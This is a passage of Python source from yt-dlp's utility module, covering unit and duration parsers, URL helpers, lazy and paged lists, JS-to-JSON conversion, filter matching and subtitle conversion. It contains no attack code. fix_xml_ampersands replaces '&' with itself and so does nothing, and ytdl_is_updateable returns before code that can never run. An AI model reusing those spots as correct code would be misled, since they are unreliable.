'MB': 1000 ** 2,
'mB': 1024 ** 2,
'Mb': 1000 ** 2,
'mb': 1000 ** 2,
'megabytes': 1000 ** 2,
'mebibytes': 1024 ** 2,
'GiB': 1024 ** 3,
'GB': 1000 ** 3,
'gB': 1024 ** 3,
'Gb': 1000 ** 3,
'gb': 1000 ** 3,
'gigabytes': 1000 ** 3,
'gibibytes': 1024 ** 3,
'TiB': 1024 ** 4,
'TB': 1000 ** 4,
'tB': 1024 ** 4,
'Tb': 1000 ** 4,
'tb': 1000 ** 4,
'terabytes': 1000 ** 4,
'tebibytes': 1024 ** 4,
'PiB': 1024 ** 5,
'PB': 1000 ** 5,
'pB': 1024 ** 5,
'Pb': 1000 ** 5,
'pb': 1000 ** 5,
'petabytes': 1000 ** 5,
'pebibytes': 1024 ** 5,
'EiB': 1024 ** 6,
'EB': 1000 ** 6,
'eB': 1024 ** 6,
'Eb': 1000 ** 6,
'eb': 1000 ** 6,
'exabytes': 1000 ** 6,
'exbibytes': 1024 ** 6,
'ZiB': 1024 ** 7,
'ZB': 1000 ** 7,
'zB': 1024 ** 7,
'Zb': 1000 ** 7,
'zb': 1000 ** 7,
'zettabytes': 1000 ** 7,
'zebibytes': 1024 ** 7,
'YiB': 1024 ** 8,
'YB': 1000 ** 8,
'yB': 1024 ** 8,
'Yb': 1000 ** 8,
'yb': 1000 ** 8,
'yottabytes': 1000 ** 8,
'yobibytes': 1024 ** 8,
}
return lookup_unit_table(_UNIT_TABLE, s)
def parse_count(s):
if s is None:
return None
s = s.strip()
if re.match(r'^[\d,.]+$', s):
return str_to_int(s)
_UNIT_TABLE = {
'k': 1000,
'K': 1000,
'm': 1000 ** 2,
'M': 1000 ** 2,
'kk': 1000 ** 2,
'KK': 1000 ** 2,
}
return lookup_unit_table(_UNIT_TABLE, s)
def parse_resolution(s):
if s is None:
return {}
mobj = re.search(r'\b(?P<w>\d+)\s*[xX×]\s*(?P<h>\d+)\b', s)
if mobj:
return {
'width': int(mobj.group('w')),
'height': int(mobj.group('h')),
}
mobj = re.search(r'\b(\d+)[pPiI]\b', s)
if mobj:
return {'height': int(mobj.group(1))}
mobj = re.search(r'\b([48])[kK]\b', s)
if mobj:
return {'height': int(mobj.group(1)) * 540}
return {}
def parse_bitrate(s):
if not isinstance(s, compat_str):
return
mobj = re.search(r'\b(\d+)\s*kbps', s)
if mobj:
return int(mobj.group(1))
def month_by_name(name, lang='en'):
""" Return the number of a month by (locale-independently) English name """
month_names = MONTH_NAMES.get(lang, MONTH_NAMES['en'])
try:
return month_names.index(name) + 1
except ValueError:
return None
def month_by_abbreviation(abbrev):
""" Return the number of a month by (locale-independently) English
abbreviations """
try:
return [s[:3] for s in ENGLISH_MONTH_NAMES].index(abbrev) + 1
except ValueError:
return None
def fix_xml_ampersands(xml_str):
"""Replace all the '&' by '&' in XML"""
return re.sub(
r'&(?!amp;|lt;|gt;|apos;|quot;|#x[0-9a-fA-F]{,4};|#[0-9]{,4};)',
'&',
xml_str)
def setproctitle(title):
assert isinstance(title, compat_str)
# ctypes in Jython is not complete
# http://bugs.jython.org/issue2148
if sys.platform.startswith('java'):
return
try:
libc = ctypes.cdll.LoadLibrary('libc.so.6')
except OSError:
return
except TypeError:
# LoadLibrary in Windows Python 2.7.13 only expects
# a bytestring, but since unicode_literals turns
# every string into a unicode string, it fails.
return
title_bytes = title.encode('utf-8')
buf = ctypes.create_string_buffer(len(title_bytes))
buf.value = title_bytes
try:
libc.prctl(15, buf, 0, 0, 0)
except AttributeError:
return # Strange libc, just skip this
def remove_start(s, start):
return s[len(start):] if s is not None and s.startswith(start) else s
def remove_end(s, end):
return s[:-len(end)] if s is not None and s.endswith(end) else s
def remove_quotes(s):
if s is None or len(s) < 2:
return s
for quote in ('"', "'", ):
if s[0] == quote and s[-1] == quote:
return s[1:-1]
return s
def get_domain(url):
domain = re.match(r'(?:https?:\/\/)?(?:www\.)?(?P<domain>[^\n\/]+\.[^\n\/]+)(?:\/(.*))?', url)
return domain.group('domain') if domain else None
def url_basename(url):
path = compat_urlparse.urlparse(url).path
return path.strip('/').split('/')[-1]
def base_url(url):
return re.match(r'https?://[^?#&]+/', url).group()
def urljoin(base, path):
if isinstance(path, bytes):
path = path.decode('utf-8')
if not isinstance(path, compat_str) or not path:
return None
if re.match(r'^(?:[a-zA-Z][a-zA-Z0-9+-.]*:)?//', path):
return path
if isinstance(base, bytes):
base = base.decode('utf-8')
if not isinstance(base, compat_str) or not re.match(
r'^(?:https?:)?//', base):
return None
return compat_urlparse.urljoin(base, path)
class HEADRequest(compat_urllib_request.Request):
def get_method(self):
return 'HEAD'
class PUTRequest(compat_urllib_request.Request):
def get_method(self):
return 'PUT'
def int_or_none(v, scale=1, default=None, get_attr=None, invscale=1):
if get_attr:
if v is not None:
v = getattr(v, get_attr, None)
if v == '':
v = None
if v is None:
return default
try:
return int(v) * invscale // scale
except (ValueError, TypeError):
return default
def str_or_none(v, default=None):
return default if v is None else compat_str(v)
def str_to_int(int_str):
""" A more relaxed version of int_or_none """
if isinstance(int_str, compat_integer_types):
return int_str
elif isinstance(int_str, compat_str):
int_str = re.sub(r'[,\.\+]', '', int_str)
return int_or_none(int_str)
def float_or_none(v, scale=1, invscale=1, default=None):
if v is None:
return default
try:
return float(v) * invscale / scale
except (ValueError, TypeError):
return default
def bool_or_none(v, default=None):
return v if isinstance(v, bool) else default
def strip_or_none(v, default=None):
return v.strip() if isinstance(v, compat_str) else default
def url_or_none(url):
if not url or not isinstance(url, compat_str):
return None
url = url.strip()
return url if re.match(r'^(?:(?:https?|rt(?:m(?:pt?[es]?|fp)|sp[su]?)|mms|ftps?):)?//', url) else None
def strftime_or_none(timestamp, date_format, default=None):
datetime_object = None
try:
if isinstance(timestamp, compat_numeric_types): # unix timestamp
datetime_object = datetime.datetime.utcfromtimestamp(timestamp)
elif isinstance(timestamp, compat_str): # assume YYYYMMDD
datetime_object = datetime.datetime.strptime(timestamp, '%Y%m%d')
return datetime_object.strftime(date_format)
except (ValueError, TypeError, AttributeError):
return default
def parse_duration(s):
if not isinstance(s, compat_basestring):
return None
s = s.strip()
days, hours, mins, secs, ms = [None] * 5
m = re.match(r'(?:(?:(?:(?P<days>[0-9]+):)?(?P<hours>[0-9]+):)?(?P<mins>[0-9]+):)?(?P<secs>[0-9]+)(?P<ms>\.[0-9]+)?Z?$', s)
if m:
days, hours, mins, secs, ms = m.groups()
else:
m = re.match(
r'''(?ix)(?:P?
(?:
[0-9]+\s*y(?:ears?)?\s*
)?
(?:
[0-9]+\s*m(?:onths?)?\s*
)?
(?:
[0-9]+\s*w(?:eeks?)?\s*
)?
(?:
(?P<days>[0-9]+)\s*d(?:ays?)?\s*
)?
T)?
(?:
(?P<hours>[0-9]+)\s*h(?:ours?)?\s*
)?
(?:
(?P<mins>[0-9]+)\s*m(?:in(?:ute)?s?)?\s*
)?
(?:
(?P<secs>[0-9]+)(?P<ms>\.[0-9]+)?\s*s(?:ec(?:ond)?s?)?\s*
)?Z?$''', s)
if m:
days, hours, mins, secs, ms = m.groups()
else:
m = re.match(r'(?i)(?:(?P<hours>[0-9.]+)\s*(?:hours?)|(?P<mins>[0-9.]+)\s*(?:mins?\.?|minutes?)\s*)Z?$', s)
if m:
hours, mins = m.groups()
else:
return None
duration = 0
if secs:
duration += float(secs)
if mins:
duration += float(mins) * 60
if hours:
duration += float(hours) * 60 * 60
if days:
duration += float(days) * 24 * 60 * 60
if ms:
duration += float(ms)
return duration
def prepend_extension(filename, ext, expected_real_ext=None):
name, real_ext = os.path.splitext(filename)
return (
'{0}.{1}{2}'.format(name, ext, real_ext)
if not expected_real_ext or real_ext[1:] == expected_real_ext
else '{0}.{1}'.format(filename, ext))
def replace_extension(filename, ext, expected_real_ext=None):
name, real_ext = os.path.splitext(filename)
return '{0}.{1}'.format(
name if not expected_real_ext or real_ext[1:] == expected_real_ext else filename,
ext)
def check_executable(exe, args=[]):
""" Checks if the given binary is installed somewhere in PATH, and returns its name.
args can be a list of arguments for a short output (like -version) """
try:
process_communicate_or_kill(subprocess.Popen(
[exe] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE))
except OSError:
return False
return exe
def get_exe_version(exe, args=['--version'],
version_re=None, unrecognized='present'):
""" Returns the version of the specified executable,
or False if the executable is not present """
try:
# STDIN should be redirected too. On UNIX-like systems, ffmpeg triggers
# SIGTTOU if yt-dlp is run in the background.
# See https://github.com/ytdl-org/youtube-dl/issues/955#issuecomment-209789656
out, _ = process_communicate_or_kill(subprocess.Popen(
[encodeArgument(exe)] + args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT))
except OSError:
return False
if isinstance(out, bytes): # Python 2.x
out = out.decode('ascii', 'ignore')
return detect_exe_version(out, version_re, unrecognized)
def detect_exe_version(output, version_re=None, unrecognized='present'):
assert isinstance(output, compat_str)
if version_re is None:
version_re = r'version\s+([-0-9._a-zA-Z]+)'
m = re.search(version_re, output)
if m:
return m.group(1)
else:
return unrecognized
class LazyList(collections.Sequence):
''' Lazy immutable list from an iterable
Note that slices of a LazyList are lists and not LazyList'''
def __init__(self, iterable):
self.__iterable = iter(iterable)
self.__cache = []
self.__reversed = False
def __iter__(self):
if self.__reversed:
# We need to consume the entire iterable to iterate in reverse
yield from self.exhaust()
return
yield from self.__cache
for item in self.__iterable:
self.__cache.append(item)
yield item
def __exhaust(self):
self.__cache.extend(self.__iterable)
return self.__cache
def exhaust(self):
''' Evaluate the entire iterable '''
return self.__exhaust()[::-1 if self.__reversed else 1]
@staticmethod
def __reverse_index(x):
return -(x + 1)
def __getitem__(self, idx):
if isinstance(idx, slice):
step = idx.step or 1
start = idx.start if idx.start is not None else 0 if step > 0 else -1
stop = idx.stop if idx.stop is not None else -1 if step > 0 else 0
if self.__reversed:
(start, stop), step = map(self.__reverse_index, (start, stop)), -step
idx = slice(start, stop, step)
elif isinstance(idx, int):
if self.__reversed:
idx = self.__reverse_index(idx)
start = stop = idx
else:
raise TypeError('indices must be integers or slices')
if start < 0 or stop < 0:
# We need to consume the entire iterable to be able to slice from the end
# Obviously, never use this with infinite iterables
return self.__exhaust()[idx]
n = max(start, stop) - len(self.__cache) + 1
if n > 0:
self.__cache.extend(itertools.islice(self.__iterable, n))
return self.__cache[idx]
def __bool__(self):
try:
self[-1] if self.__reversed else self[0]
except IndexError:
return False
return True
def __len__(self):
self.exhaust()
return len(self.__cache)
def reverse(self):
self.__reversed = not self.__reversed
return self
def __repr__(self):
# repr and str should mimic a list. So we exhaust the iterable
return repr(self.exhaust())
def __str__(self):
return repr(self.exhaust())
class PagedList(object):
def __len__(self):
# This is only useful for tests
return len(self.getslice())
def getslice(self, start, end):
raise NotImplementedError('This method must be implemented by subclasses')
def __getitem__(self, idx):
if not isinstance(idx, int) or idx < 0:
raise TypeError('indices must be non-negative integers')
entries = self.getslice(idx, idx + 1)
return entries[0] if entries else None
class OnDemandPagedList(PagedList):
def __init__(self, pagefunc, pagesize, use_cache=True):
self._pagefunc = pagefunc
self._pagesize = pagesize
self._use_cache = use_cache
if use_cache:
self._cache = {}
def getslice(self, start=0, end=None):
res = []
for pagenum in itertools.count(start // self._pagesize):
firstid = pagenum * self._pagesize
nextfirstid = pagenum * self._pagesize + self._pagesize
if start >= nextfirstid:
continue
page_results = None
if self._use_cache:
page_results = self._cache.get(pagenum)
if page_results is None:
page_results = list(self._pagefunc(pagenum))
if self._use_cache:
self._cache[pagenum] = page_results
startv = (
start % self._pagesize
if firstid <= start < nextfirstid
else 0)
endv = (
((end - 1) % self._pagesize) + 1
if (end is not None and firstid <= end <= nextfirstid)
else None)
if startv != 0 or endv is not None:
page_results = page_results[startv:endv]
res.extend(page_results)
# A little optimization - if current page is not "full", ie. does
# not contain page_size videos then we can assume that this page
# is the last one - there are no more ids on further pages -
# i.e. no need to query again.
if len(page_results) + startv < self._pagesize:
break
# If we got the whole page, but the next page is not interesting,
# break out early as well
if end == nextfirstid:
break
return res
class InAdvancePagedList(PagedList):
def __init__(self, pagefunc, pagecount, pagesize):
self._pagefunc = pagefunc
self._pagecount = pagecount
self._pagesize = pagesize
def getslice(self, start=0, end=None):
res = []
start_page = start // self._pagesize
end_page = (
self._pagecount if end is None else (end // self._pagesize + 1))
skip_elems = start - start_page * self._pagesize
only_more = None if end is None else end - start
for pagenum in range(start_page, end_page):
page = list(self._pagefunc(pagenum))
if skip_elems:
page = page[skip_elems:]
skip_elems = None
if only_more is not None:
if len(page) < only_more:
only_more -= len(page)
else:
page = page[:only_more]
res.extend(page)
break
res.extend(page)
return res
def uppercase_escape(s):
unicode_escape = codecs.getdecoder('unicode_escape')
return re.sub(
r'\\U[0-9a-fA-F]{8}',
lambda m: unicode_escape(m.group(0))[0],
s)
def lowercase_escape(s):
unicode_escape = codecs.getdecoder('unicode_escape')
return re.sub(
r'\\u[0-9a-fA-F]{4}',
lambda m: unicode_escape(m.group(0))[0],
s)
def escape_rfc3986(s):
"""Escape non-ASCII characters as suggested by RFC 3986"""
if sys.version_info < (3, 0) and isinstance(s, compat_str):
s = s.encode('utf-8')
return compat_urllib_parse.quote(s, b"%/;:@&=+$,!~*'()?#[]")
def escape_url(url):
"""Escape URL as suggested by RFC 3986"""
url_parsed = compat_urllib_parse_urlparse(url)
return url_parsed._replace(
netloc=url_parsed.netloc.encode('idna').decode('ascii'),
path=escape_rfc3986(url_parsed.path),
params=escape_rfc3986(url_parsed.params),
query=escape_rfc3986(url_parsed.query),
fragment=escape_rfc3986(url_parsed.fragment)
).geturl()
def read_batch_urls(batch_fd):
def fixup(url):
if not isinstance(url, compat_str):
url = url.decode('utf-8', 'replace')
BOM_UTF8 = ('\xef\xbb\xbf', '\ufeff')
for bom in BOM_UTF8:
if url.startswith(bom):
url = url[len(bom):]
url = url.lstrip()
if not url or url.startswith(('#', ';', ']')):
return False
# "#" cannot be stripped out since it is part of the URI
# However, it can be safely stipped out if follwing a whitespace
return re.split(r'\s#', url, 1)[0].rstrip()
with contextlib.closing(batch_fd) as fd:
return [url for url in map(fixup, fd) if url]
def urlencode_postdata(*args, **kargs):
return compat_urllib_parse_urlencode(*args, **kargs).encode('ascii')
def update_url_query(url, query):
if not query:
return url
parsed_url = compat_urlparse.urlparse(url)
qs = compat_parse_qs(parsed_url.query)
qs.update(query)
return compat_urlparse.urlunparse(parsed_url._replace(
query=compat_urllib_parse_urlencode(qs, True)))
def update_Request(req, url=None, data=None, headers={}, query={}):
req_headers = req.headers.copy()
req_headers.update(headers)
req_data = data or req.data
req_url = update_url_query(url or req.get_full_url(), query)
req_get_method = req.get_method()
if req_get_method == 'HEAD':
req_type = HEADRequest
elif req_get_method == 'PUT':
req_type = PUTRequest
else:
req_type = compat_urllib_request.Request
new_req = req_type(
req_url, data=req_data, headers=req_headers,
origin_req_host=req.origin_req_host, unverifiable=req.unverifiable)
if hasattr(req, 'timeout'):
new_req.timeout = req.timeout
return new_req
def _multipart_encode_impl(data, boundary):
content_type = 'multipart/form-data; boundary=%s' % boundary
out = b''
for k, v in data.items():
out += b'--' + boundary.encode('ascii') + b'\r\n'
if isinstance(k, compat_str):
k = k.encode('utf-8')
if isinstance(v, compat_str):
v = v.encode('utf-8')
# RFC 2047 requires non-ASCII field names to be encoded, while RFC 7578
# suggests sending UTF-8 directly. Firefox sends UTF-8, too
content = b'Content-Disposition: form-data; name="' + k + b'"\r\n\r\n' + v + b'\r\n'
if boundary.encode('ascii') in content:
raise ValueError('Boundary overlaps with data')
out += content
out += b'--' + boundary.encode('ascii') + b'--\r\n'
return out, content_type
def multipart_encode(data, boundary=None):
'''
Encode a dict to RFC 7578-compliant form-data
data:
A dict where keys and values can be either Unicode or bytes-like
objects.
boundary:
If specified a Unicode object, it's used as the boundary. Otherwise
a random boundary is generated.
Reference: https://tools.ietf.org/html/rfc7578
'''
has_specified_boundary = boundary is not None
while True:
if boundary is None:
boundary = '---------------' + str(random.randrange(0x0fffffff, 0xffffffff))
try:
out, content_type = _multipart_encode_impl(data, boundary)
break
except ValueError:
if has_specified_boundary:
raise
boundary = None
return out, content_type
def dict_get(d, key_or_keys, default=None, skip_false_values=True):
if isinstance(key_or_keys, (list, tuple)):
for key in key_or_keys:
if key not in d or d[key] is None or skip_false_values and not d[key]:
continue
return d[key]
return default
return d.get(key_or_keys, default)
def try_get(src, getter, expected_type=None):
for get in variadic(getter):
try:
v = get(src)
except (AttributeError, KeyError, TypeError, IndexError):
pass
else:
if expected_type is None or isinstance(v, expected_type):
return v
def merge_dicts(*dicts):
merged = {}
for a_dict in dicts:
for k, v in a_dict.items():
if v is None:
continue
if (k not in merged
or (isinstance(v, compat_str) and v
and isinstance(merged[k], compat_str)
and not merged[k])):
merged[k] = v
return merged
def encode_compat_str(string, encoding=preferredencoding(), errors='strict'):
return string if isinstance(string, compat_str) else compat_str(string, encoding, errors)
US_RATINGS = {
'G': 0,
'PG': 10,
'PG-13': 13,
'R': 16,
'NC': 18,
}
TV_PARENTAL_GUIDELINES = {
'TV-Y': 0,
'TV-Y7': 7,
'TV-G': 0,
'TV-PG': 0,
'TV-14': 14,
'TV-MA': 17,
}
def parse_age_limit(s):
if type(s) == int:
return s if 0 <= s <= 21 else None
if not isinstance(s, compat_basestring):
return None
m = re.match(r'^(?P<age>\d{1,2})\+?$', s)
if m:
return int(m.group('age'))
s = s.upper()
if s in US_RATINGS:
return US_RATINGS[s]
m = re.match(r'^TV[_-]?(%s)$' % '|'.join(k[3:] for k in TV_PARENTAL_GUIDELINES), s)
if m:
return TV_PARENTAL_GUIDELINES['TV-' + m.group(1)]
return None
def strip_jsonp(code):
return re.sub(
r'''(?sx)^
(?:window\.)?(?P<func_name>[a-zA-Z0-9_.$]*)
(?:\s*&&\s*(?P=func_name))?
\s*\(\s*(?P<callback_data>.*)\);?
\s*?(?://[^\n]*)*$''',
r'\g<callback_data>', code)
def js_to_json(code, vars={}):
# vars is a dict of var, val pairs to substitute
COMMENT_RE = r'/\*(?:(?!\*/).)*?\*/|//[^\n]*\n'
SKIP_RE = r'\s*(?:{comment})?\s*'.format(comment=COMMENT_RE)
INTEGER_TABLE = (
(r'(?s)^(0[xX][0-9a-fA-F]+){skip}:?$'.format(skip=SKIP_RE), 16),
(r'(?s)^(0+[0-7]+){skip}:?$'.format(skip=SKIP_RE), 8),
)
def fix_kv(m):
v = m.group(0)
if v in ('true', 'false', 'null'):
return v
elif v.startswith('/*') or v.startswith('//') or v.startswith('!') or v == ',':
return ""
if v[0] in ("'", '"'):
v = re.sub(r'(?s)\\.|"', lambda m: {
'"': '\\"',
"\\'": "'",
'\\\n': '',
'\\x': '\\u00',
}.get(m.group(0), m.group(0)), v[1:-1])
else:
for regex, base in INTEGER_TABLE:
im = re.match(regex, v)
if im:
i = int(im.group(1), base)
return '"%d":' % i if v.endswith(':') else '%d' % i
if v in vars:
return vars[v]
return '"%s"' % v
return re.sub(r'''(?sx)
"(?:[^"\\]*(?:\\\\|\\['"nurtbfx/\n]))*[^"\\]*"|
'(?:[^'\\]*(?:\\\\|\\['"nurtbfx/\n]))*[^'\\]*'|
{comment}|,(?={skip}[\]}}])|
(?:(?<![0-9])[eE]|[a-df-zA-DF-Z_])[.a-zA-Z_0-9]*|
\b(?:0[xX][0-9a-fA-F]+|0+[0-7]+)(?:{skip}:)?|
[0-9]+(?={skip}:)|
!+
'''.format(comment=COMMENT_RE, skip=SKIP_RE), fix_kv, code)
def qualities(quality_ids):
""" Get a numeric quality value out of a list of possible values """
def q(qid):
try:
return quality_ids.index(qid)
except ValueError:
return -1
return q
DEFAULT_OUTTMPL = {
'default': '%(title)s [%(id)s].%(ext)s',
'chapter': '%(title)s - %(section_number)03d %(section_title)s [%(id)s].%(ext)s',
}
OUTTMPL_TYPES = {
'chapter': None,
'subtitle': None,
'thumbnail': None,
'description': 'description',
'annotation': 'annotations.xml',
'infojson': 'info.json',
'pl_thumbnail': None,
'pl_description': 'description',
'pl_infojson': 'info.json',
}
# As of [1] format syntax is:
# %[mapping_key][conversion_flags][minimum_width][.precision][length_modifier]type
# 1. https://docs.python.org/2/library/stdtypes.html#string-formatting
STR_FORMAT_RE = r'''(?x)
(?<!%)
%
(?P<has_key>\((?P<key>{0})\))? # mapping key
(?P<format>
(?:[#0\-+ ]+)? # conversion flags (optional)
(?:\d+)? # minimum field width (optional)
(?:\.\d+)? # precision (optional)
[hlL]? # length modifier (optional)
[diouxXeEfFgGcrs] # conversion type
)
'''
def limit_length(s, length):
""" Add ellipses to overly long strings """
if s is None:
return None
ELLIPSES = '...'
if len(s) > length:
return s[:length - len(ELLIPSES)] + ELLIPSES
return s
def version_tuple(v):
return tuple(int(e) for e in re.split(r'[-.]', v))
def is_outdated_version(version, limit, assume_new=True):
if not version:
return not assume_new
try:
return version_tuple(version) < version_tuple(limit)
except ValueError:
return not assume_new
def ytdl_is_updateable():
""" Returns if yt-dlp can be updated with -U """
return False
from zipimport import zipimporter
return isinstance(globals().get('__loader__'), zipimporter) or hasattr(sys, 'frozen')
def args_to_str(args):
# Get a short string representation for a subprocess command
return ' '.join(compat_shlex_quote(a) for a in args)
def error_to_compat_str(err):
err_str = str(err)
# On python 2 error byte string must be decoded with proper
# encoding rather than ascii
if sys.version_info[0] < 3:
err_str = err_str.decode(preferredencoding())
return err_str
def mimetype2ext(mt):
if mt is None:
return None
ext = {
'audio/mp4': 'm4a',
# Per RFC 3003, audio/mpeg can be .mp1, .mp2 or .mp3. Here use .mp3 as
# it's the most popular one
'audio/mpeg': 'mp3',
'audio/x-wav': 'wav',
}.get(mt)
if ext is not None:
return ext
_, _, res = mt.rpartition('/')
res = res.split(';')[0].strip().lower()
return {
'3gpp': '3gp',
'smptett+xml': 'tt',
'ttaf+xml': 'dfxp',
'ttml+xml': 'ttml',
'x-flv': 'flv',
'x-mp4-fragmented': 'mp4',
'x-ms-sami': 'sami',
'x-ms-wmv': 'wmv',
'mpegurl': 'm3u8',
'x-mpegurl': 'm3u8',
'vnd.apple.mpegurl': 'm3u8',
'dash+xml': 'mpd',
'f4m+xml': 'f4m',
'hds+xml': 'f4m',
'vnd.ms-sstr+xml': 'ism',
'quicktime': 'mov',
'mp2t': 'ts',
'x-wav': 'wav',
}.get(res, res)
def parse_codecs(codecs_str):
# http://tools.ietf.org/html/rfc6381
if not codecs_str:
return {}
split_codecs = list(filter(None, map(
lambda str: str.strip(), codecs_str.strip().strip(',').split(','))))
vcodec, acodec = None, None
for full_codec in split_codecs:
codec = full_codec.split('.')[0]
if codec in ('avc1', 'avc2', 'avc3', 'avc4', 'vp9', 'vp8', 'hev1', 'hev2', 'h263', 'h264', 'mp4v', 'hvc1', 'av01', 'theora'):
if not vcodec:
vcodec = full_codec
elif codec in ('mp4a', 'opus', 'vorbis', 'mp3', 'aac', 'ac-3', 'ec-3', 'eac3', 'dtsc', 'dtse', 'dtsh', 'dtsl'):
if not acodec:
acodec = full_codec
else:
write_string('WARNING: Unknown codec %s\n' % full_codec, sys.stderr)
if not vcodec and not acodec:
if len(split_codecs) == 2:
return {
'vcodec': split_codecs[0],
'acodec': split_codecs[1],
}
else:
return {
'vcodec': vcodec or 'none',
'acodec': acodec or 'none',
}
return {}
def urlhandle_detect_ext(url_handle):
getheader = url_handle.headers.get
cd = getheader('Content-Disposition')
if cd:
m = re.match(r'attachment;\s*filename="(?P<filename>[^"]+)"', cd)
if m:
e = determine_ext(m.group('filename'), default_ext=None)
if e:
return e
return mimetype2ext(getheader('Content-Type'))
def encode_data_uri(data, mime_type):
return 'data:%s;base64,%s' % (mime_type, base64.b64encode(data).decode('ascii'))
def age_restricted(content_limit, age_limit):
""" Returns True iff the content should be blocked """
if age_limit is None: # No limit set
return False
if content_limit is None:
return False # Content available for everyone
return age_limit < content_limit
def is_html(first_bytes):
""" Detect whether a file contains HTML by examining its first bytes. """
BOMS = [
(b'\xef\xbb\xbf', 'utf-8'),
(b'\x00\x00\xfe\xff', 'utf-32-be'),
(b'\xff\xfe\x00\x00', 'utf-32-le'),
(b'\xff\xfe', 'utf-16-le'),
(b'\xfe\xff', 'utf-16-be'),
]
for bom, enc in BOMS:
if first_bytes.startswith(bom):
s = first_bytes[len(bom):].decode(enc, 'replace')
break
else:
s = first_bytes.decode('utf-8', 'replace')
return re.match(r'^\s*<', s)
def determine_protocol(info_dict):
protocol = info_dict.get('protocol')
if protocol is not None:
return protocol
url = info_dict['url']
if url.startswith('rtmp'):
return 'rtmp'
elif url.startswith('mms'):
return 'mms'
elif url.startswith('rtsp'):
return 'rtsp'
ext = determine_ext(url)
if ext == 'm3u8':
return 'm3u8'
elif ext == 'f4m':
return 'f4m'
return compat_urllib_parse_urlparse(url).scheme
def render_table(header_row, data, delim=False, extraGap=0, hideEmpty=False):
""" Render a list of rows, each as a list of values """
def get_max_lens(table):
return [max(len(compat_str(v)) for v in col) for col in zip(*table)]
def filter_using_list(row, filterArray):
return [col for (take, col) in zip(filterArray, row) if take]
if hideEmpty:
max_lens = get_max_lens(data)
header_row = filter_using_list(header_row, max_lens)
data = [filter_using_list(row, max_lens) for row in data]
table = [header_row] + data
max_lens = get_max_lens(table)
if delim:
table = [header_row] + [['-' * ml for ml in max_lens]] + data
format_str = ' '.join('%-' + compat_str(ml + extraGap) + 's' for ml in max_lens[:-1]) + ' %s'
return '\n'.join(format_str % tuple(row) for row in table)
def _match_one(filter_part, dct):
COMPARISON_OPERATORS = {
'<': operator.lt,
'<=': operator.le,
'>': operator.gt,
'>=': operator.ge,
'=': operator.eq,
'!=': operator.ne,
}
operator_rex = re.compile(r'''(?x)\s*
(?P<key>[a-z_]+)
\s*(?P<op>%s)(?P<none_inclusive>\s*\?)?\s*
(?:
(?P<intval>[0-9.]+(?:[kKmMgGtTpPeEzZyY]i?[Bb]?)?)|
(?P<quote>["\'])(?P<quotedstrval>(?:\\.|(?!(?P=quote)|\\).)+?)(?P=quote)|
(?P<strval>(?![0-9.])[a-z0-9A-Z]*)
)
\s*$
''' % '|'.join(map(re.escape, COMPARISON_OPERATORS.keys())))
m = operator_rex.search(filter_part)
if m:
op = COMPARISON_OPERATORS[m.group('op')]
actual_value = dct.get(m.group('key'))
if (m.group('quotedstrval') is not None
or m.group('strval') is not None
# If the original field is a string and matching comparisonvalue is
# a number we should respect the origin of the original field
# and process comparison value as a string (see
# https://github.com/ytdl-org/youtube-dl/issues/11082).
or actual_value is not None and m.group('intval') is not None
and isinstance(actual_value, compat_str)):
if m.group('op') not in ('=', '!='):
raise ValueError(
'Operator %s does not support string values!' % m.group('op'))
comparison_value = m.group('quotedstrval') or m.group('strval') or m.group('intval')
quote = m.group('quote')
if quote is not None:
comparison_value = comparison_value.replace(r'\%s' % quote, quote)
else:
try:
comparison_value = int(m.group('intval'))
except ValueError:
comparison_value = parse_filesize(m.group('intval'))
if comparison_value is None:
comparison_value = parse_filesize(m.group('intval') + 'B')
if comparison_value is None:
raise ValueError(
'Invalid integer value %r in filter part %r' % (
m.group('intval'), filter_part))
if actual_value is None:
return m.group('none_inclusive')
return op(actual_value, comparison_value)
UNARY_OPERATORS = {
'': lambda v: (v is True) if isinstance(v, bool) else (v is not None),
'!': lambda v: (v is False) if isinstance(v, bool) else (v is None),
}
operator_rex = re.compile(r'''(?x)\s*
(?P<op>%s)\s*(?P<key>[a-z_]+)
\s*$
''' % '|'.join(map(re.escape, UNARY_OPERATORS.keys())))
m = operator_rex.search(filter_part)
if m:
op = UNARY_OPERATORS[m.group('op')]
actual_value = dct.get(m.group('key'))
return op(actual_value)
raise ValueError('Invalid filter part %r' % filter_part)
def match_str(filter_str, dct):
""" Filter a dictionary with a simple string syntax. Returns True (=passes filter) or false """
return all(
_match_one(filter_part, dct) for filter_part in filter_str.split('&'))
def match_filter_func(filter_str):
def _match_func(info_dict):
if match_str(filter_str, info_dict):
return None
else:
video_title = info_dict.get('title', info_dict.get('id', 'video'))
return '%s does not pass filter %s, skipping ..' % (video_title, filter_str)
return _match_func
def parse_dfxp_time_expr(time_expr):
if not time_expr:
return
mobj = re.match(r'^(?P<time_offset>\d+(?:\.\d+)?)s?$', time_expr)
if mobj:
return float(mobj.group('time_offset'))
mobj = re.match(r'^(\d+):(\d\d):(\d\d(?:(?:\.|:)\d+)?)$', time_expr)
if mobj:
return 3600 * int(mobj.group(1)) + 60 * int(mobj.group(2)) + float(mobj.group(3).replace(':', '.'))
def srt_subtitles_timecode(seconds):
return '%02d:%02d:%02d,%03d' % (seconds / 3600, (seconds % 3600) / 60, seconds % 60, (seconds % 1) * 1000)
def dfxp2srt(dfxp_data):
'''
@param dfxp_data A bytes-like object containing DFXP data
@returns A unicode object containing converted SRT data
'''
LEGACY_NAMESPACES = (
(b'http://www.w3.org/ns/ttml', [
b'http://www.w3.org/2004/11/ttaf1',
b'http://www.w3.org/2006/04/ttaf1',
b'http://www.w3.org/2006/10/ttaf1',
]),
(b'http://www.w3.org/ns/ttml#styling', [
b'http://www.w3.org/ns/ttml#style',
]),
)
SUPPORTED_STYLING = [
'color',
'fontFamily',
'fontSize',
'fontStyle',
'fontWeight',
'textDecoration'
]
_x = functools.partial(xpath_with_ns, ns_map={
'xml': 'http://www.w3.org/XML/1998/namespace',
'ttml': 'http://www.w3.org/ns/ttml',
'tts': 'http://www.w3.org/ns/ttml#styling',
})
styles = {}
default_style = {}
class TTMLPElementParser(object):
_out = ''
_unclosed_elements = []
_applied_styles = []
def start(self, tag, attrib):
if tag in (_x('ttml:br'), 'br'):
self._out += '\n'
else:
unclosed_elements = []
style = {}
element_style_id = attrib.get('style')
if default_style:
style.update(default_style)
if element_style_id:
style.update(styles.get(element_style_id, {}))
for prop in SUPPORTED_STYLING:
prop_val = attrib.get(_x('tts:' + prop))
if prop_val:
style[prop] = prop_val
if style:
font = ''
